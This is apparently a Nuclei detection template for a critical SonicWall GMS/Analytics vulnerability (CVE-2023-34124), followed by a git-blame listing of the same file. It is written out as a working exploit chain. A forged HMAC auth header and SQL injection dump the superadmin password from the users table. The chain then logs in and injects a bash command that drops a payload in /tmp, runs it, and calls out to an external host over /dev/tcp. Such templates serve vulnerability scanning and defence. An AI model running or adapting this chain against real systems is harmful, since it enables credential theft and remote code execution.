nuclei-templates/http/cves/2023/CVE-2023-34124.yaml

id: CVE-2023-34124

info:
  name: SonicWall GMS and Analytics Web Services - Shell Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions
  reference:
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
    - https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis
    - https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
    - https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34124
    cwe-id: CWE-287,CWE-305
    epss-score: 0.01154
    cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
    epss-percentile: 0.83049
  metadata:
    max-request: 4
    verified: true
    shodan-query: http.favicon.hash:-1381126564
    vendor: sonicwall
    product: analytics
  tags: cve,cve2023,sonicwall,shell,injection,auth-bypass,instrusive
variables:
  callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
  query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
  secret: '?~!@#$%^^()'
  auth: "{{hmac('sha1', query, secret)}}"
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
        Host: {{Hostname}}
        Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}
      - |
        GET /appliance/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0
      - |
        POST /appliance/applianceMainPage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "<title>SonicWall Universal Management Appliance</title>"
          - "<title>SonicWall Universal Management Host</title>"
        condition: or

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: json
        part: body
        internal: true
        name: alias
        group: 1
        json:
          - '.alias'

      - type: regex
        part: body
        internal: true
        name: servertoken
        group: 1
        regex:
          - "getPwdHash.*,'([0-9]+)'"
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`id: CVE-2023-34124`

			`info:`
template update 2023-08-28 18:55:45 +00:00			`name: SonicWall GMS and Analytics Web Services - Shell Injection`
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`author: iamnoooob,rootxharsh,pdresearch`
			`severity: critical`
			`description: \|`
template update 2023-08-28 18:55:45 +00:00			`The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions`
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`reference:`
			`- https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb`
			`- https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis`
			`- https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/`
template update 2023-08-28 18:55:45 +00:00			`- https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-34124`
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cve-id: CVE-2023-34124`
			`cwe-id: CWE-287,CWE-305`
			`epss-score: 0.01154`
			`cpe: cpe:2.3:a:sonicwall:analytics::::::::`
			`epss-percentile: 0.83049`
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`metadata:`
			`max-request: 4`
			`verified: true`
template update 2023-08-28 18:55:45 +00:00			`shodan-query: http.favicon.hash:-1381126564`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: sonicwall`
			`product: analytics`
template update 2023-08-28 18:55:45 +00:00			`tags: cve,cve2023,sonicwall,shell,injection,auth-bypass,instrusive`
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`variables:`
Update CVE-2023-34124.yaml 2023-08-28 17:05:22 +00:00			`callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"`
			`query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"`
			`secret: '?~!@#$%^^()'`
			`auth: "{{hmac('sha1', query, secret)}}"`
			`filename: "{{rand_base(5)}}"`
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1`
			`Host: {{Hostname}}`
variable update 2023-08-28 15:50:44 +00:00			`Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}`
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`- \|`
			`GET /appliance/login HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /appliance/applianceMainPage HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.:",""))) }}&password={{replace_regex(alias,"^.:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0`
			`- \|`
			`POST /appliance/applianceMainPage HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

randstr 2023-08-28 17:00:28 +00:00			`num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+\|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+`
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00
			`cookie-reuse: true`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_3`
			`words:`
			`- "<title>SonicWall Universal Management Appliance</title>"`
			`- "<title>SonicWall Universal Management Host</title>"`
			`condition: or`
template update 2023-08-28 18:55:45 +00:00
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "dns"`

			`extractors:`
yaml lint 2023-08-28 16:43:33 +00:00			`- type: json`
fix spaceing 2023-08-28 16:37:59 +00:00			`part: body`
			`internal: true`
			`name: alias`
randstr 2023-08-28 17:00:28 +00:00			`group: 1`
fix spaceing 2023-08-28 16:37:59 +00:00			`json:`
Update CVE-2023-34124.yaml 2023-08-28 17:05:22 +00:00			`- '.alias'`
Create CVE-2023-34124.yaml 2023-08-28 13:26:29 +00:00
regex fix 2023-08-28 16:44:26 +00:00			`- type: regex`
fix spaceing 2023-08-28 16:37:59 +00:00			`part: body`
			`internal: true`
			`name: servertoken`
randstr 2023-08-28 17:00:28 +00:00			`group: 1`
regex fix 2023-08-28 16:44:26 +00:00			`regex:`
Update CVE-2023-34124.yaml 2023-08-28 17:05:22 +00:00			`- "getPwdHash.*,'([0-9]+)'"`